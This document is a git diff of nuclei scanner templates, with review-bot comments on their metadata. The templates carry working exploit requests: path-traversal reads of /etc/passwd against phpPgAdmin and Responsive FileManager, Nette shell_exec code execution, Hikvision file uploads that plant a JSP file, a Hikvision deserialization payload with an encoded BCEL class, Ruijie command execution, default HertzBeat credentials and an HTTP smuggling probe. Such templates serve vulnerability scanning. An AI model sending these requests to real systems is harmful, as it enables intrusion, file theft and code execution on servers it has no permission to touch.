+++ b/poc/cve/cve-2008-5587.yaml @@ -1,28 +1,27 @@ id: CVE-2008-5587 + info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/7363 - - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ - - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 - - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 - classification: - cve-id: CVE-2008-5587 + reference: https://www.exploit-db.com/exploits/7363 + metadata: - shodan-query: http.title:"phpPgAdmin" - tags: cve,cve2008,lfi,phppgadmin + shodan-query: 'http.title:"phpPgAdmin"' + description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." + requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml index 668fd715ec..0cf11fcf80 100644 --- a/poc/cve/cve-2016-6210.yaml +++ b/poc/cve/cve-2016-6210.yaml @@ -1,10 +1,9 @@ id: CVE-2016-6210 - info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - + tags: cve,cve2016,network,openssh description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 
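Review bot: The cve-2008-5587.yaml hunk removes `tags: cve,cve2008,lfi,phppgadmin` and the whole `classification` block without replacing them, so the template can no longer be selected with `-tags` and loses its `cve-id` metadata; the same `tags` deletion happens in cve-2018-15535.yaml (`tags: cve,cve2018,lfi`) and cve-2020-15227.yaml (`tags: cve,cve2020,nette,rce`) further down this diff. Re-add the line under `info:`, e.g. `tags: cve,cve2008,lfi,phppgadmin`. The `description` now follows `metadata:`; with indentation lost in this view I cannot tell whether it landed inside `metadata`, which would drop it from the template summary, so that is worth checking in the file. Trimming `reference` to a single URL also discards the archived advisories that documented the issue.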
@@ -16,18 +15,15 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 - network: - host: - "{{Hostname}}" - "{{Host}}:22" - matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' - extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' diff --git a/poc/cve/cve-2018-15535.yaml b/poc/cve/cve-2018-15535.yaml index ed7aa501ed..a4fa48f002 100644 --- a/poc/cve/cve-2018-15535.yaml +++ b/poc/cve/cve-2018-15535.yaml 
@@ -1,31 +1,32 @@ id: CVE-2018-15535 + info: - name: Responsive FileManager <9.13.4 - Local File Inclusion + name: Responsive FileManager < 9.13.4 - Directory Traversal author: daffainfo severity: high - description: Responsive FileManager before version 9.13.4 is susceptible to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory. Instead, because it does not properly neutralize get_file sequences such as ".." can resolve to a location that is outside of that directory, aka local file inclusion. + description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. reference: - https://www.exploit-db.com/exploits/45271 - - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 - - http://seclists.org/fulldisclosure/2018/Aug/34 - - https://www.exploit-db.com/exploits/45271/ + - https://www.cvedetails.com/cve/CVE-2018-15535 + classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2018-15535 cwe-id: CWE-22 - tags: cve,cve2018,lfi + requests: - method: GET path: - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/07 diff --git a/poc/cve/cve-2020-15227.yaml b/poc/cve/cve-2020-15227.yaml index 2bba2c812a..9a75579bdb 100644 --- a/poc/cve/cve-2020-15227.yaml +++ b/poc/cve/cve-2020-15227.yaml 
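Review bot: `cvss-score: 7.50` parses to the float 7.5, so the trailing zero adds nothing and diverges from the `7.5` the line previously held (cve-2020-15227.yaml in this diff does the same with `9.80`); write `cvss-score: 7.5`. The regex was loosened from `root:.*:0:0:` to `root:.*:0:0`, which still anchors on the uid and gid fields, so that change is fine. The deletion of `tags` in this hunk is raised in the cve-2008-5587.yaml note.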
@@ -1,22 +1,34 @@ id: CVE-2020-15227 + info: - name: nette Framework RCE - author: nithissh - severity: high - reference: unknown - tags: cve,cve2020,nette,rce + name: Nette Framework RCE + author: becivells + severity: critical + description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 + - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 + - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# + - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15227 + cwe-id: CWE-74 + requests: - method: GET path: - - "{{BaseURL}}/index.php/nette.micro/?callback=shell_exec&cmd=id&what=-1" + - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1" + matchers-condition: and matchers: - - type: word - words: - - "uid" - - "gid" - part: body - condition: and + + - type: regex + regex: + - "root:.*:0:0:" + - type: status status: - 200 diff --git a/poc/default/default-cred-hertzbeat.yaml b/poc/default/default-cred-hertzbeat.yaml new file mode 100644 index 0000000000..c332a19d4d --- /dev/null +++ b/poc/default/default-cred-hertzbeat.yaml 
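Review bot: The check now reads `/etc/passwd` and matches `root:.*:0:0:` where the previous version ran `id` and matched `uid`/`gid`; the old check already confirmed execution with a less intrusive command and without tying the result to a Unix-style target, so the swap makes the probe heavier for the target and narrower in coverage, and I would keep the earlier `cmd` and matcher. Dropping `index.php/` from the path assumes URL rewriting is enabled on the target; if that cannot be assumed, say so in the description. `cvss-score: 9.80` has the trailing-zero issue raised on cve-2018-15535.yaml, and the deleted `tags` line is covered in the cve-2008-5587.yaml note.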
@@ -0,0 +1,33 @@ +id: apache-hertzbeat-default-login + +info: + name: Apache HertzBeat Default Credentials + author: securitytaters + severity: high + description: Apache HertzBeat enables default admin credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://github.com/apache/hertzbeat?tab=readme-ov-file#1install-quickly-via-docker + tags: hertzbeat,default-login + +variables: + username: admin + password: hertzbeat + +http: + - raw: + - |- + POST /api/account/auth/form HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"type":0,"identifier":"{{username}}","credential":"{{password}}"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"token":"eyJ' + - type: status + status: + - 200 diff --git a/poc/http/cl-te-http-smuggling.yaml b/poc/http/cl-te-http-smuggling.yaml index ddb83e064d..278b84146d 100644 --- a/poc/http/cl-te-http-smuggling.yaml +++ b/poc/http/cl-te-http-smuggling.yaml 
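Review bot: The template `id: apache-hertzbeat-default-login` does not match the file name `default-cred-hertzbeat.yaml`, unlike the other new files in this commit (attire.yaml carries `id: attire`, the fluentform file an id equal to its stem); pick one so the two stay greppable together, e.g. `id: default-cred-hertzbeat`. The `'"token":"eyJ'` word match is a reasonable indicator of a successful login, but it fires on any 200 response that carries a JWT; if the auth endpoint returns an explicit error field on failure, a negative `part: body` check on it would tighten the match — I cannot confirm the response shape from the diff.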
@@ -1,37 +1,35 @@ -id: CL-TE-http-smuggling - -info: - name: HTTP request smuggling, basic CL.TE vulnerability - author: pdteam, akincibor - severity: Low - -http: - - raw: - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - unsafe: true - matchers: - - type: dsl - dsl: - - 'contains(body, "Unrecognized method GPOST")' \ No newline at end of file +id: CL-TE-http-smuggling +info: + name: HTTP request smuggling, basic CL.TE vulnerability + author: pdteam, akincibor + severity: Low +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + - |+ + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + + unsafe: true + matchers: + - type: dsl + dsl: + - 'contains(body, "Unrecognized method GPOST")' diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml index cd961f6e81..538f6fd6d5 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml 
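Review bot: The first raw request's block scalar changes from `|+` to `|` while the second keeps `|+`, so the two otherwise identical requests now send different bodies: `|` clips to a single trailing newline, `|+` keeps every trailing blank line, and the bytes after `G` are exactly what a `Content-Length: 6` CL.TE probe depends on. Either both should be `|+` (the previous state) or both `|`, and the intended body length belongs in a comment above the raw block. The rename from `http:` back to `requests:` reverts to the older template syntax; nuclei still accepts it as a deprecated alias as far as I know, but the templates in this commit mix both spellings, so settling on `http:` would be cleaner. `severity: Low` should be the lowercase `low` used elsewhere in the repository.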
@@ -1,27 +1,35 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /center/api/files;.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "test.jsp")' + condition: and diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml index e86e8491d1..cd961f6e81 100644 
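Review bot: The template `id: HiKVISION` is shared with the `Fileupload_report.yaml` hunk below, and `HIKVISION` is shared between `upload_action.yaml` and `Hikvision_applyCT_RCE.yaml`; nuclei keys templates by id, so duplicates collide at load time as far as I recall and in any case make results indistinguishable. Give each file a distinct id derived from its name, e.g. `id: hikvision-ivms-8700-files-upload`. The new request writes `test.jsp` into the target's webapps directory through a traversal filename and the matcher only checks `contains(body_1, "test.jsp")`, so the artefact it leaves behind should be stated in `description:` so operators know the scan is not read-only. The identical change is made again to `poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml` later in this diff, and the same comments apply there.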
--- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml 
@@ -1,40 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - raw: - - | - POST /svm/api/external/report HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> - - ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' - condition: and + 
- type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 7f081b05e0..7e328a8b1b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml 
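Review bot: The new content of `Fileupload_report.yaml` is the env information-leakage template, so the file name no longer describes what it checks, and the new `author:` line carries a garbled value `zerZero Trust Security Attack and Defense Laboratoryo`. Restore `author: Zero Trust Security Attack and Defense Laboratory`, and either rename the file to match its content (e.g. `Hikvision_iVMS-8700_env_info_leak.yaml`) or keep the report-upload content here if the swap was accidental. The same hunk is repeated for `poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml`.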
@@ -1,48 +1,50 @@ id: HIKVISION info: - name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - str3: '<%out.print("{{str2}}");%>' + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' http: - raw: - | - POST /eps/resourceOperations/upload.action HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - User-Agent: MicroMessenger - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj - - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj - Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" Content-Type: image/jpeg - {{str3}} - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- - | - GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + GET /eps/upload/{{name}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: res_id + name: name json: - 
".data.resourceUuid" internal: true matchers: - - type: dsl - dsl: - - body_2 == str2 + - type: word + words: + - '{{randstr}}' diff --git a/poc/other/Ruijie_EXCU_SHELL.yaml b/poc/other/Ruijie_EXCU_SHELL.yaml index fa762ac2f6..f2db119795 100644 --- a/poc/other/Ruijie_EXCU_SHELL.yaml +++ b/poc/other/Ruijie_EXCU_SHELL.yaml @@ -1,37 +1,33 @@ id: Ruijie info: - name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability + name: Ruijie Switch WEB Management System EXCU_ SHELL author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges + Ruijie Switch WEB Management System EXCU_ SHELL metadata: - fofa-query: app="Ruijie-NBR路由器" - hunter-query: web.title="锐捷网络 --NBR路由器--登录界面" + fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" + hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif" http: - raw: - | - POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1 + GET /EXCU_SHELL HTTP/1.1 Host: {{Hostname}} - Accept: text/plain, */*; q=0.01 - Content-Disposition: form-data; name="file"; filename="111.php" - Content-Type: image/jpeg + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Cmdnum: '1' + Command1: show running-config + Confirm1: n - - - | - GET /321/test.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'status_code_2 == 200' - - 'contains(body_1, "test.php")' - - 'contains(body_2, "PHP Version")' + - 'contains(body_1, "configuration")' condition: and 
diff --git a/poc/other/attire.yaml b/poc/other/attire.yaml new file mode 100644 index 0000000000..0618f60e61 --- /dev/null +++ b/poc/other/attire.yaml @@ -0,0 +1,59 @@ +id: attire + +info: + name: > + Attire <= 2.0.6 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f21cbe18-77e1-4a9a-96a0-74edaef0db3e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/attire/" + google-query: inurl:"/wp-content/themes/attire/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,attire,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/attire/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "attire" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.6') \ No newline at end of file diff --git a/poc/other/fluentform-026589d017c577988978620b6f7c244f.yaml b/poc/other/fluentform-026589d017c577988978620b6f7c244f.yaml new file mode 100644 index 0000000000..cae1262143 --- /dev/null +++ b/poc/other/fluentform-026589d017c577988978620b6f7c244f.yaml 
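Review bot: `classification` has three bare keys — `cvss-metrics:`, `cvss-score:`, `cve-id:` — which parse as null, `description: >` is followed by an empty line and becomes an empty string, and `shodan-query: 'vuln:'` is a placeholder; either fill these from the referenced Wordfence record or remove the empty keys, since null fields are worse than absent ones for tooling that validates templates. `tags: cve,...` is also set although no `cve-id` is given. The `version` extractor is declared twice with the same name (once `internal: true`, once not); if the second copy exists only to surface the version in output, a comment saying so would stop the next reader deleting it as a duplicate. `fluentform-026589d017c577988978620b6f7c244f.yaml` in this commit has the identical issues. The file also ends without a trailing newline.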
@@ -0,0 +1,59 @@ +id: fluentform-026589d017c577988978620b6f7c244f + +info: + name: > + Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.18 - Missing Authorization to Authenticated (Subscriber+) Mailchimp Integration Modification + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8242e0f0-b9c5-46fe-b691-3275cd0f9a43?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/fluentform/" + google-query: inurl:"/wp-content/plugins/fluentform/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,fluentform,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fluentform" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.18') \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml 
@@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
